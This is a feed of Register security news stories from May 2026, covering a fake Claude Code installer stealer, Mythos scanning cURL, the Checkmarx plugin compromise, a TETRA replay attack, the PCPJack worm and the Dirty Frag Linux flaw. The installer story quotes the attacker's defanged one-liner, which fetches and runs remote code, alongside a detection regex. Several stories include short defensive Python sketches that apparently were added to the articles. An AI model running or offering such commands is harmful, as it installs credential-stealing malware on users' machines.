News

Cookie thieves caught stealing dev secrets via fake Claude Code installers

The Register - 1 hour 22 min ago
An ongoing campaign steals developers’ secrets via fake Claude Code installers and other popular coding tools, according to Ontinue’s security researchers. The lure - as with several other infostealer attacks targeting developers over the past several months - swaps a legitimate one-line installer command for an attacker-controlled one. In this case, the legitimate command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaces the destination host, yielding “irm events[.]msft23[.]com | iex”. The payload is unique and doesn’t match any documented malware family. It does, however, wreak havoc on developers, exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. According to the threat hunters who documented the new campaign on Monday: “We publish for peer correlation rather than attribution.”
The attack also abuses the IElevator2 COM interface, part of Chromium’s elevation service used to handle App-Bound Encryption (ABE) - specifically, encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who had relied on earlier ABE bypass techniques and commodity stealers that simply file-copied the SQLite databases holding cookies and saved passwords. However, crafty crooks (and security researchers) soon figured out workarounds to abuse IElevator2, as is the case with the newly spotted malware.
The attack runs across three domains, all registered within six days of each other in April, and all fronted through Cloudflare. It relies on developers searching for “install claude code” and selecting a sponsored result that leads to a lookalike Claude Code installation page.
The page downloads and executes Anthropic’s authentic installer - but as Ontinue’s team found, the malicious instruction isn’t stored in the file itself; it is instead rendered into the HTML of the landing page. “Automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell delivered from a Cloudflare-fronted domain bearing a valid Let’s Encrypt certificate,” the researchers wrote. “Victims, meanwhile, are presented with an entirely different command.”
The pasted command pulls down an obfuscated PowerShell loader that injects a native ABE helper into a live browser process. The helper’s “exclusive purpose,” we’re told, is to invoke the browser’s IElevator2 COM interface and recover the App-Bound Encryption key. The helper names its exfiltration pipe using Chromium’s legitimate Mojo naming convention for IPC pipes. It then attempts to use IElevator2 to decrypt developer secrets, falling back to the legacy IElevator interface on the Elevation Service if the new one doesn’t work. Ontinue’s researchers published a full list of elevation-service identifiers, so be sure to check that out. After receiving the ABE key from the helper, the PowerShell loader decrypts the local browser databases and sends the stolen data to an attacker-controlled server via an in-memory secure_prefs.zip archive.
The malware hunters say they compared the malware against published reporting for several stealers - including Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, and Storm - and found no technical match. The closest is Glove Stealer, first documented by Gen Digital in November 2024, which also abuses IElevator via a helper module communicating over a named pipe.
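The delivery trick here - clean script at the URL, a different command rendered into the page - suggests one cheap defender-side check: extract any install one-liners shown on a page and compare their destination hosts against the hosts you expect. A minimal Python sketch (the regex, the `suspicious_install_commands` helper, and the allowlist are all illustrative, not from Ontinue's tooling):

```python
import re

# Hosts we expect legitimate install one-liners to reference; anything else
# is worth a closer look. (Illustrative allowlist, not an official list.)
EXPECTED_HOSTS = {"claude.ai"}

# Matches PowerShell one-liners of the form: irm <url-or-host> | iex
IRM_IEX = re.compile(r"irm\s+(?:https?://)?([^\s/|]+)[^|]*\|\s*iex", re.IGNORECASE)

def suspicious_install_commands(text):
    """Return the destination hosts of any 'irm ... | iex' commands found in
    the text whose host is not on the expected-host allowlist."""
    hosts = [m.group(1).lower() for m in IRM_IEX.finditer(text)]
    return [h for h in hosts if h not in EXPECTED_HOSTS]
```

Running the real landing-page HTML through something like this, alongside a raw fetch of the script URL, would surface exactly the mismatch Ontinue describes.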
The orchestration model, however, differs from Glove’s in that it uses a “small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell.” That split matters for defenders, the research team wrote, because “behavioral rule sets that look at the native PE in isolation will see nothing actionable. Detection has to land at the COM call and at the PowerShell layer.” ®
Categories: News

Anthropic’s bug-hunting Mythos was greatest marketing stunt ever, says cURL creator

The Register - 5 hours 12 min ago
cURL developer Daniel Stenberg has seen Anthropic’s Mythos, a model the AI biz has suggested is too capable at finding security holes to release publicly, scan his popular open source project. But after the system turned up just a single vulnerability, he concluded the hype around Mythos was “primarily marketing” rather than a major AI security breakthrough. Stenberg explained in a Monday blog post that he was promised access to Anthropic’s Mythos model - sort of - through the AI biz’s Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl’s codebase and later sent him a report. “It’s not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway,” Stenberg explained. “Getting the tool to generate a first proper scan and analysis would be great, whoever did it.” The scan analyzed curl’s git repository at a recent master-branch commit, and the resulting report, sent to him earlier this month, flagged just five things it claimed were “confirmed security vulnerabilities” in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report “felt like nothing,” and that feeling was further validated by a review of Mythos’ findings. “Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability,” Stenberg said, bringing us back to the aforementioned number. As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug.
“The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June,” the cURL meister noted. “The flaw is not going to make anyone grasp for breath.” That said, Mythos did find several other non-security bugs that Stenberg said the team is working on fixing, and he noted that their descriptions and explanations were well done. Mythos can do good work, in other words, but it’s not the ground-breaking, game-changing AI model Anthropic has claimed. “My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing,” Stenberg said in the blog post. “I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos.”
cURL code is no stranger to AI
To say cURL has become widely used in its nearly three decades of existence would be an understatement. Its wide reach has meant that its team has been running it through all sorts of static code analyzers and fuzz tests since well before the dawn of the AI age. With AI’s rise, the cURL team has adapted, meaning Mythos is hardly the first AI to get its fingers on cURL’s codebase. “These tools and the analyses they have done have triggered somewhere between two and three hundred bugfixes merged in curl through-out the recent 8-10 months or so,” Stenberg said of tools like AISLE, Zeropath, and OpenAI Codex Security that’ve tested cURL code. “A bunch of the findings these AI tools reported were confirmed vulnerabilities and have been published as CVEs. Probably a dozen or more.” Stenberg’s experience with AI testing cURL, in other words, makes the project a great test bed for seeing whether Mythos can really find more than the average AI.
As Stenberg noted elsewhere in his blog post, Mythos isn’t doing anything particularly novel when it comes to security discoveries: It might be a bit better at finding things than previous models, but “it is not better to a degree that seems to make a significant dent in code analyzing,” the cURL author noted. That’s not to say Stenberg dismisses AI’s ability to improve software, though. Yes, he closed the cURL bug bounty earlier this year after an influx of sloppy, useless bug reports, but a few months before the closure he also noted that some security researchers assisted by AI have made valuable reports. “AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past,” Stenberg said, adding an important qualifier for the Mythos moment: “All modern AI models are good at this now.”
Mythos isn’t any more creative than its creators
Both older AI models and security-focused tools like Mythos share a common limitation, as far as Stenberg is concerned: They’re only as good at finding security vulnerabilities as the humans who programmed them. “AI tools find the usual and established kind of errors we already know about. It just finds new instances of them,” Stenberg said. “We have not seen any AI so far report a vulnerability that would somehow be of a novel kind or something totally new.” As for Mythos, Stenberg remains unimpressed, calling it “an amazingly successful marketing stunt for sure” in his blog post. In an email to The Register, Stenberg admitted that it’d be possible for AI models to discover new, novel types of vulnerabilities, but he’s still not convinced they can go beyond what humans are capable of finding, given that they’re limited by our understanding of how software vulnerabilities work. At the end of the day, Stenberg explained, when we talk about security, we’re only talking about code.
“Source code is text and it feels like maybe we already know about most ways we can do security problems in it,” he pondered in his email. In other words, like the valuable AI-assisted reports made to the cURL bug bounty program before its closure due to a flood of AI garbage, making valuable use of systems like Mythos is going to require humans to get creative. Sorry, no foisting your critical thinking onto a bot. “Human researchers have always used tools when they look for security problems,” Stenberg told us. “Adding AIs to the mix gives the humans even more powerful tools to use, more ways to find problems. I expect that many security bugs going forward will be found by humans coming up with new ways and angles of prompting the AIs.” Stenberg said that he hopes he’ll actually get his hands on Mythos so he can experiment with its capabilities, but he doesn’t seem to be holding out hope the promised access will materialize. “I have been promised access and for all I know I will eventually get it,” Stenberg told us. “I just don't know when.” ®

BWH Hotels guests warned after reservation data checks out with cybercrooks

The Register - 7 hours 9 min ago
BWH Hotels is informing customers about a third-party data breach that gave cybercriminals access to six months' worth of data. The notification email stated that BWH Hotels, which owns the WorldHotels, Best Western Hotels & Resorts, and Sure Hotels brands, identified the intrusion on April 22, but the affected data goes back to October 14, 2025. BWH Hotels CTO Bill Ryan, who penned the notification email, said names, email addresses, telephone numbers, and/or home addresses belonging to "certain guests" were accessed by an unauthorized third party. The intruders also accessed reservation details, such as reservation numbers, dates of stay, and any special requests. The company confirmed that the attack targeted one of its "web applications that houses certain guest reservation data." No payment or bank details were involved. The Register asked BWH Hotels whether the intrusion began in October and went undetected until April, or whether a later breach exposed data dating back to October. We also asked if this was related to information we were sent in March about BWH Hotels customer booking data being stolen and used for phishing campaigns. At the time, the company neither confirmed nor denied the information seen by The Register. BWH Hotels did not immediately respond to our request for comment on Monday. "Upon discovering the incident, we immediately took the application offline and revoked the unauthorized access," said Ryan. "We have engaged leading external cybersecurity experts to support our incident response efforts and to assist with the further strengthening of existing safeguards." "We advise guests to be extra vigilant when viewing any unexpected or suspicious communications about hotel stays. If you receive a suspicious communication such as an unexpected email, text, WhatsApp message, or telephone call that asks for payment, codes, logins, or 'verification,' even if they reference a BWH Hotels property or an upcoming reservation, do not engage.
Navigate to sites directly rather than clicking links." ®

Checkmarx tackles another TeamPCP intrusion as Jenkins plugin sabotaged

The Register - 9 hours 32 min ago
Checkmarx’s software engineers are still working to remove a malicious version of the code security outfit’s Jenkins plugin after detecting an unauthorized upload over the weekend. The company updated customers on Saturday, May 9, after discovering that a tampered version of its AST Scanner, which is used for security scans in Jenkins CI pipelines, had been made available via the Jenkins Marketplace. “We are aware that a modified version of the Checkmarx Jenkins AST plugin was published to the Jenkins Marketplace,” it said in a statement. “We are in the process of publishing a new version of this plug-in.” Versions published as of May 9, 2026, should not be trusted, it added, before urging all users to check they’re running the correct release (2.0.13-829.vc72453fa_1c16) published on December 17, 2025. Installed by several hundred controllers, the plugin remains available at the time of writing, with the rogue build appearing as the most recent version, although pull requests actioned on Monday morning suggest it will soon be pulled down. “What makes this particularly dangerous for Jenkins users is the trust model at play,” said SOCRadar in its coverage. “The Checkmarx Jenkins plugin is a tool people install specifically to improve the security of their pipelines. “A backdoored version doesn’t just compromise one project; it rides trusted infrastructure into every build pipeline it touches, with access to source code, environment variables, tokens, and whatever secrets the runner can see.” Security engineer Adnan Khan spotted the compromise quickly over the weekend. TeamPCP, the crew behind an earlier supply chain attack affecting Checkmarx in April, defaced the company’s GitHub and published six packages, each with a description alluding to the Shai-Hulud wormable malware.
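Checkmarx's advice boils down to pinning the one known-good release. A trivial sketch of that check in Python (the `plugin_trusted` helper is ours, not Checkmarx's; a real audit should also verify the artifact's checksum, not just its version string):

```python
# Known-good pin from Checkmarx's advisory; later uploads fall inside the
# compromise window and should be treated as untrusted.
KNOWN_GOOD = "2.0.13-829.vc72453fa_1c16"

def plugin_trusted(installed_version: str) -> bool:
    """Trust only the exact release Checkmarx points to - any other
    version string, newer or otherwise, fails the check."""
    return installed_version == KNOWN_GOOD
```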
These packages no longer appear on Checkmarx’s GitHub, but TeamPCP made multiple changes to the AST plugin’s page, renaming it to “Checkmarx-Fully-Hacked-by-TeamPCP-and-Their-Customers-Should-Cancel-Now” and altering the description to claim Checkmarx failed to rotate its secrets. The latest infiltration of Checkmarx’s internals marks the third time TeamPCP has compromised the company’s packages in as many months. As The Register previously reported, the crooks successfully targeted Checkmarx’s AST plugin for GitHub Actions and its KICS static analysis tool back in March, deploying credential-stealing malware. SOCRadar said the latest TeamPCP compromise of the Jenkins plugin suggests that either TeamPCP was telling the truth about Checkmarx’s secrets rotation, or its members took advantage of an additional persistence mechanism that the security vendor failed to notice during its response to the March intrusion. ®

Taiwan's train cyber-trauma reveals a global system that’s coming off the tracks

The Register - 13 hours 13 min ago
OPINION There are three little words to make the heart beat faster in anyone who knows what they mean: critical infrastructure resilience. If you run that infrastructure, or a country dependent on it, you need energy, communication and transport to be impregnable to cyber attacks. This is doubly so if that country is five minutes by incoming missile from an implacable, hyper-competent enemy sworn to invade you. One that is building and equipping its military as fast as it can with this one thing in mind. One with the most invasive and brazen state hacking machinery on the planet. Thus it was a very bad day indeed when Taiwan’s entire bullet train system was disabled for nearly an hour by an unknown attacker. It got even worse when that attacker turned out not to be the implacable and hyper-resourced state actor over the Taiwan Strait, but a university student with a yen for radio and some kit he bought online. On the one hand, it’s good to see the grand tradition of young hackers causing havoc from their bedrooms remains in good repair. On the other, WTRF? The information released by the Taiwanese authorities is scant on detail, but enough to be pretty sure what actually happened. It’s bad news not just for Taiwan but for more than 100 countries that also use the TETRA two-way radio standard involved, often for emergency services. In many cases, it was the default replacement for unencrypted FM two-way radios, adding encryption, flexibility and network security. These were state of the art when TETRA was developed in the 1980s and 1990s - and work as well in 2026 as you might expect. Oops. There have been upgrades and, especially after the 2023 vulnerability disclosures, an accelerated program of making things better. But a lot of the installed base globally is old and lacks over-the-air security updates, and in any case spending money on new radios normally sits at the bottom of the list for any state or public service organization. Things have to get really bad first.
Perhaps they just have. (North America is the only region where TETRA is uncommon, as it isn’t approved for public service use. This was either acute foresight or the fact that the TE in TETRA, now officially TErrestrial, used to stand for Trans-Europe. The American system, P25, has never, however, been renamed Freedom Frequencies. Now on with the show.) The network vulnerabilities are one side of the story. Our doughty hacker is the other. Reportedly, he didn’t have any TETRA hardware, just a laptop connected to a radio and an ‘SDR filter’. The latter makes little sense; it is far more likely that he had a software defined radio (SDR) called a HackRF. There are plenty of other devices that could have been used, but the HackRF is the weapon of choice for the gung-ho radio nut. SDR is a technique that has completely changed the rules of how to radio. All radios before it had to be entirely or mostly analog, with precision hardware dedicated to whatever job each radio had to do. This hardware can also be looked at as an analog computer, as it can be modelled as a set of mathematical transformations on the received signal. Analog computers have their place, just not in the 21st century. SDR is radio as digital computer. At heart, it has three components: an analog-to-digital converter to turn the incoming signal into a stream of numbers, very fast processing to do the radio math, and a digital-to-analog converter to play the results. What you get is triply terrific. Digital processing is perfect, where analog processing adds noise and distortion. Nothing is fixed; everything can be re-engineered with new code. And it can be hog-whimperingly cheap. HackRF is all those things and more. It can be configured as a portable touch-screen device. It transmits and receives from DC to daylight. You can pick one up for less than the price of a mid-range mobile. It is open source. It works with all manner of SDR creation tools, utilities and radio packages.
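That ADC-math-DAC pipeline can be illustrated with the most basic piece of SDR math there is: sample a carrier, multiply by a local oscillator at the same frequency, and average to low-pass the result, recovering the signal's amplitude. A deliberately idealized Python sketch (no noise, no real filter beyond a mean; the sample rate and frequency are arbitrary demo values):

```python
import math

FS = 10_000          # sample rate, Hz (arbitrary for the demo)
F_CARRIER = 1_000    # carrier frequency, Hz

def sample_carrier(amplitude, n):
    """Toy 'ADC': n samples of an unmodulated cosine carrier."""
    return [amplitude * math.cos(2 * math.pi * F_CARRIER * i / FS) for i in range(n)]

def recover_amplitude(samples):
    """Toy SDR math: mix with a local oscillator at the carrier frequency,
    then low-pass by averaging. cos x cos averages to A/2 over whole periods,
    so doubling the mean of the mixed signal recovers A."""
    mixed = [s * math.cos(2 * math.pi * F_CARRIER * i / FS) for i, s in enumerate(samples)]
    return 2 * sum(mixed) / len(mixed)
```

Everything a dedicated analog mixer and filter used to do in copper and crystal is here as two list comprehensions, which is the whole point: change the code, change the radio.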
There are infinite legitimate uses. Most excitingly, you can download apps for it that do everything, most especially the kind of thing that will introduce you with surprising rapidity to a wide range of new friends with no sense of humor, and love letters that look suspiciously like arrest warrants. Think of it as speed dating, but with more guns and fewer no-thank-yous. GPS spoofing, aviation and marine location transponders, satellite comms, data eavesdropping and injection - take your pick. You’ll need it to unlock the cell door. It is the data detection and injection that seems to have been the downfall of all concerned. A handset had its transmission decoded, and the result was retransmitted into the system as if it were that original radio. Whether the decoded data already had the General Alarm set, or whether the data had to be modified before retransmission, is not yet known. Doesn’t matter. It’s called a replay attack, and it has been and mostly is used in stand-alone devices called code grabbers to unlock and steal expensive cars with wireless keys. Some countries, including Canada and the UK, have banned code grabbers, but this has failed on two counts. Code grabbers are small gadgets that can be bought online from China, and good luck policing that. Also, thieves are notably indifferent to laws. That notwithstanding, the UK is thinking of extending the ban to other classes of naughty wireless, and would doubtless like to do the same with HackRF, at least as of last week. Of course, it can’t be: SDRs can’t be banned as a class, especially open source ones made out of standard chips and open code. They are general purpose computers, albeit with specialisms. It doesn’t matter if you’re dismayed or delighted that things like HackRF exist; that genie is out of the bottle. What is truly dismaying is that replay attacks are a solved problem, trivially so. Choose a big keyspace, randomize and never repeat keys.
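The standard fix is exactly what that last sentence describes: authenticate every frame and never accept the same one twice. A minimal Python sketch of the rolling-code idea, using an HMAC over a monotonic counter - illustrative only, as real schemes (a car fob's, or a radio network's) differ in detail:

```python
import hmac
import hashlib
import secrets

KEY = secrets.token_bytes(32)   # shared secret: the "big keyspace"

def make_frame(counter):
    """Transmitter: tag each frame with a never-repeating counter and a MAC
    computed over it under the shared key."""
    tag = hmac.new(KEY, counter.to_bytes(8, "big"), hashlib.sha256).digest()
    return counter, tag

class Receiver:
    def __init__(self):
        self.last_counter = -1

    def accept(self, counter, tag):
        """Reject tampered frames (bad MAC) and any counter already seen.
        A captured-and-retransmitted frame fails the second check."""
        expected = hmac.new(KEY, counter.to_bytes(8, "big"), hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            return False
        if counter <= self.last_counter:
            return False          # replay: counter not fresh
        self.last_counter = counter
        return True
```

An attacker who records a valid frame and plays it back hits the counter check; an attacker who bumps the counter can't forge the MAC without the key. That is the whole fix, which is why shipping gear without it in 2026 is so hard to excuse.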
That one is on lazy car makers and, apparently, the world of TETRA. Fixing that class of lazy, outdated security vulnerability will be very expensive. Embedded systems are like that, especially old ones. Not fixing it will be a gamble with infinite downside, in a world where electronic warfare systems that used to cost hundreds of millions now pour out of AliExpress for a few bucks. HackRF is to TETRA as Crocodile Dundee’s knife is to the mugger’s. Critical infrastructure resilience. Just three little words, but if you say them, you’d better mean it. And it won’t be cheap. ®

Worm rubs out competitor's malware, then takes control

The Register - Fri, 08/05/2026 - 18:26
There’s a mysterious framework worming its way through exposed cloud instances removing all traces of TeamPCP infections, but it’s not benevolent by a long shot: Whoever is behind this bit of malware may be cleaning up after those who came before, but only so they can take their place. Discovered by security outfit SentinelOne’s SentinelLabs researchers and dubbed PCPJack for its habit of stealing previously compromised systems from TeamPCP, the worm was first spotted in late April by a Kubernetes-focused VirusTotal hunting rule. It stood out from known cloud hacktools, said SentinelLabs, because the first action it always takes is to eliminate tools associated with TeamPCP attacks. The script didn’t stop there, though. “We initially considered that this toolset could be a researcher removing TeamPCP’s infections,” SentinelLabs said. “Analysis of the later-stage payloads indicates otherwise.” “Analyzing this script led us to discover a full framework dedicated to cloud credential harvesting and propagating onto other systems, both internal and external to the victim’s environment,” SentinelLabs continued. In other words, this thing will harvest credentials from everywhere it can get its hands on, and then find new, unsecured cloud environments to spread itself to. TeamPCP came onto the scene late last year, and since then has made a name for itself primarily through a successful compromise of the Trivy vulnerability scanner. That act spread credential-harvesting malware which attackers then used to pivot to more valuable targets, and became one of the most notable supply chain attacks in recent memory. Unlike TeamPCP’s campaign, which relied on humans spreading compromised software, this one spreads of its own accord. Infections start when already-infected systems look for exposed services, including Docker, Kubernetes, Redis, MongoDB, and RayML, as well as exposed web applications.
Once it finds a vulnerable environment, it runs a shell script on the target system that sets up an environment to download additional payloads and searches for TeamPCP processes and artifacts to kill. That part of the infection downloads the worm itself, along with modules to enable lateral movement, parse credentials and encrypt them for exfiltration, and scan the web for new environments to infect. From there, the worm goes to work with the second module in its kit, which conducts the actual credential theft. This portion of the infection targets environment variables, config files, SSH keys, Docker secrets, Kubernetes tokens, and credentials from a list of finance, enterprise, messaging, and cloud service targets so long that we recommend taking a look at it here, or just assuming whatever you’re using is probably being targeted. SentinelLabs noted that the lack of a cryptominer in the malware package is unusual, and said the particular services it targets suggest its goal is either to conduct its own spam campaigns and financial fraud with the stolen data, or to make the data it harvests available to those planning similar crimes. The worm’s practice of removing TeamPCP files could be opportunistic, or could mean there’s drama going on in the cybercrime world. “We have no evidence to suggest whether this toolset represents someone associated with the group or familiar with their activities,” SentinelLabs noted. “However, the first toolset’s focus on disabling and replacing TeamPCP’s services implies a direct focus on the threat actor’s activities rather than pure cloud attack opportunism.” Because this is a worm relying on unsecured cloud and web app instances ripe for targeting, the mitigation recommendations are pretty simple: Keep your cloud platforms secure, and ensure authentication is required even for instances of things like Docker and Kubernetes that aren’t exposed to the internet. ®
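That mitigation advice can be turned into a quick self-audit: probe your own hosts for the default ports of the services the worm hunts and see what answers. A Python sketch (port list abridged and illustrative; only point this at infrastructure you own - probing other people's hosts is a crime):

```python
import socket

# Default ports for a few of the services the worm hunts: Docker API,
# Kubernetes API server, Redis, MongoDB. (Abridged, illustrative list.)
SERVICE_PORTS = {"docker": 2375, "kubernetes": 6443, "redis": 6379, "mongodb": 27017}

def port_open(host, port, timeout=1.0):
    """True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def exposed_services(host):
    """Names of worm-targeted services reachable on the given host."""
    return [name for name, port in SERVICE_PORTS.items() if port_open(host, port)]
```

Anything this turns up that doesn't require authentication is exactly the kind of instance the worm's scanner is looking for.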

'Dirty Frag' Linux flaw one-ups CopyFail with no patches and public root exploit

The Register - Fri, 08/05/2026 - 14:36
A fresh Linux privilege escalation bug dubbed "Dirty Frag" has dropped into the wild with no patches, no CVE, and a public exploit that hands attackers root access across major distributions. Security researcher Hyunwoo Kim disclosed the local privilege escalation flaw on Friday after what he said was a broken embargo forced the issue into the open. Kim described Dirty Frag as a "universal LPE" affecting "all major distributions" and warned that it delivers the same kind of immediate root access as the recent CopyFail mess – only this time, defenders do not even have patches to throw at the problem. "As with the previous Copy Fail vulnerability, Dirty Frag likewise allows immediate root privilege escalation on all major distributions," Kim said. "Because the responsible disclosure schedule and embargo have been broken, no patches exist for any distribution." Dirty Frag works by chaining together two separate Linux kernel flaws. One sits in the xfrm-ESP subsystem and dates back to a January 2017 kernel commit, according to Kim, while the second vulnerability affects RxRPC functionality introduced in 2023. Together, the two bugs allegedly let unprivileged local users overwrite protected files in memory and claw their way to root. A long list of distributions is in the firing line, according to Kim, including Ubuntu, Red Hat Enterprise Linux, CentOS Stream, Fedora, AlmaLinux, and openSUSE Tumbleweed. Separately, researchers appear to have independently reverse-engineered part of the bug chain from a publicly visible kernel fix commit before the embargo expired, adding to the disclosure mess already surrounding the flaw. One GitHub project titled "Copy Fail 2: Electric Boogaloo" claims to weaponize the ESP/xfrm side of the issue separately from Kim's full Dirty Frag chain. Kim said maintainers signed off on the disclosure of the flaw after somebody else dumped exploit details online first, collapsing the embargo before patches were finished.
So now the exploit is public, the fixes are not, and Linux admins get another long week. The disclosure comes as the industry is still dealing with the fallout from CopyFail, another Linux privilege escalation bug that recently landed in CISA's Known Exploited Vulnerabilities catalog after attackers started cashing in on it in the wild. But Dirty Frag makes the recent CopyFail chaos look relatively organized. There's still no CVE, no coordinated patch rollout, and not much in the way of mitigation. Kim published a temporary workaround that disables affected ESP and RxRPC modules before clearing the system page cache. Useful, perhaps, although "turn bits of the kernel off and hope for the best" is not usually the sort of guidance admins enjoy seeing. ®
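Before applying that workaround, a sensible first triage step is checking whether the implicated modules are loaded at all. A Python sketch that parses /proc/modules-style output (the module names here are illustrative stand-ins for the ESP and RxRPC code paths - consult Kim's advisory for the actual list before unloading anything):

```python
# Illustrative module names for the affected ESP and RxRPC code paths;
# check the advisory for the definitive list.
AFFECTED = {"esp4", "esp6", "rxrpc"}

def loaded_affected(proc_modules_text):
    """Parse /proc/modules-style text (first column is the module name)
    and return the sorted subset of affected modules currently loaded."""
    loaded = {line.split()[0] for line in proc_modules_text.splitlines() if line.strip()}
    return sorted(loaded & AFFECTED)
```

On a live box that's `loaded_affected(open("/proc/modules").read())`; actually unloading anything it reports is `modprobe -r` territory, with all the caveats about breaking IPsec and AFS along the way.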

Meta U-turns on encryption push for Instagram as DMs go plaintext

The Register - Fri, 08/05/2026 - 13:42
Meta has quietly pulled the plug on encrypted Instagram DMs, meaning private messages on one of the world’s biggest social networks are no longer especially private. The change took effect today, according to a revised Meta post first published in 2022. In a statement to The Register, Meta said the feature saw limited adoption and pointed users toward WhatsApp instead. "Very few people were opting in to end-to-end encrypted messaging in DMs, so we're removing this option from Instagram in the coming months," the spokesperson said. "Anyone who wants to keep messaging with end-to-end encryption can easily do that on WhatsApp." It’s quite the reversal for a corporation that spent years telling everyone that encryption was the future of online communications, even as governments pushed back against the company’s wider rollout plans. Much of that pressure centered on child protection. Campaigners and agencies, including the NSPCC and the UK’s National Crime Agency, argued wider encryption would make it harder to detect grooming, child abuse material, and other criminal activity taking place over private messaging services. Privacy advocates, however, say Meta has just blown a hole in one of the few genuinely private corners of the platform. The Center for Democracy & Technology said it had urged Meta to reverse the decision, alongside members of the Global Encryption Coalition Steering Committee. “Without default encryption, millions of Instagram users are left exposed to surveillance, interception, and misuse of their private communications,” the group said. “These risks fall hardest on people who rely on secure messaging for their safety, including journalists, human rights defenders, and survivors of abuse.” Swiss privacy outfit Proton also questioned what exactly happens to existing chats once encryption disappears.
Because properly implemented E2EE prevents platforms from reading message contents, the company noted that Meta has not clarified whether previously encrypted conversations will remain inaccessible, get deleted, or become readable. “For Instagram, dropping E2EE is just an example of how little regard Meta has for the privacy and safety of its community,” Proton said in a blog post. Meta has become increasingly aggressive about monetizing and analyzing user interactions. Last year, the company confirmed that interactions with Meta AI tools, including those inside private conversations, could be used for ad targeting. The company has not publicly said whether ordinary Instagram messages could eventually feed into similar systems now that encryption is gone. ®
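The property Proton is pointing at - that with real E2EE the platform only ever holds ciphertext - can be shown with a deliberately toy example. This XOR one-time pad is not real messaging crypto (WhatsApp uses the Signal protocol, which is far more involved); it only illustrates what the relay does and doesn't see:

```python
import secrets

def encrypt(key, plaintext):
    """Toy one-time pad: XOR with a random, never-reused key of the same
    length. Illustrative only - do not use for anything real."""
    return bytes(k ^ p for k, p in zip(key, plaintext))

decrypt = encrypt  # XOR is its own inverse

message = b"meet at 6"
key = secrets.token_bytes(len(message))   # known only to the two endpoints
ciphertext = encrypt(key, message)        # all the platform ever relays or stores
assert decrypt(key, ciphertext) == message
```

Without the key, the stored blob is noise; which is precisely why Proton's question - what happens to those blobs when encryption is switched off - has no tidy answer.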
Categories: News

Hackers ate my homework: Educational SaaS Canvas down after cyberattack

The Register - Fri, 08/05/2026 - 11:59
Students around the world have an excuse to bunk off after hacking crew ShinyHunters did something nasty to educational SaaS Canvas. Canvas is widely used by schools and universities to communicate with students, publish and store course material, and collect assignments. An outfit called Instructure develops the software and an entry on its Status Page dated May 2 features Chief Information Security Officer Steve Proud stating the org "recently experienced a cybersecurity incident perpetrated by a criminal threat actor." "We are actively investigating this incident with the help of outside forensics experts. We are working quickly to understand the extent of the incident and actively taking steps to minimize its impact," he added. Numerous posts report that attempts to log into Canvas earlier this week failed, but did produce a notice from an entity claiming to be the notorious hacking crew ShinyHunters, who claimed the outage was only possible due to lax patching. The crew also claimed to have stolen data from institutions that use Canvas and threatened to leak it unless a "settlement" is reached by May 12. Canvas has thousands of customers, meaning any confirmed breach could have wide impact. As of Thursday evening US time, Instructure says its wares are now available "for most users" and won't offer further comment. A student of The Register's acquaintance – OK, one of my kids – shared an email advising that his uni has prevented access to Canvas while it tries to understand the situation and the risk of data leakage. We've seen multiple universities posting notices about the incident that say more or less the same thing. Most also warn students of heightened phishing risk and urge caution. Several also advise that as they require students to lodge assignments in Canvas, students can assume they have an extension on deadlines. Your correspondent's offspring does not mind this one little bit. This is an evolving story.
The Register will update it as more information becomes available. ®

Meta fights Ofcom over how many billions count as billions

The Register - Fri, 08/05/2026 - 11:39
Meta appears to have decided Britain's Online Safety Act would be much easier to swallow if Ofcom stopped counting all the money the social media giant makes everywhere else. The Facebook and Instagram owner has launched a legal challenge against the UK comms regulator, arguing that the way Ofcom calculates fees and potential penalties under the Online Safety Act is fundamentally wrong because it relies on global turnover rather than UK-specific revenue. The law allows Ofcom to fine companies up to 10 percent of their qualifying worldwide revenue, or £18 million, whichever is higher. For Meta, which brought in about $201 billion last year, that means the numbers stop sounding like regulatory penalties and start sounding like national infrastructure projects. Meta is now seeking a judicial review in the High Court over how Ofcom defines "qualifying worldwide revenue." The dispute boils down to three complaints. First, Meta argues that Ofcom should only consider UK revenue tied to regulated services, not the company’s global income. Second, it objects to rules that treat multiple services under the same corporate umbrella as jointly liable, potentially exposing the wider organization to larger penalties. Third, it is challenging how Ofcom aggregates revenue across services rather than assessing them individually. An Ofcom spokesperson told The Register: "Meta have initiated a judicial review in relation to online safety fees and penalties. Under the Online Safety Act, these are to be set with reference to a provider's 'Qualifying Worldwide Revenue', which we have defined based on a plain reading of the law. "Disappointingly, Meta are objecting to the payment of fees, and any penalties that could be levied on companies in future, that are calculated on this basis. We will robustly defend our reasoning and decisions." A Meta spokesperson told The Register: "We are committed to cooperating constructively with Ofcom as it enforces the Online Safety Act.
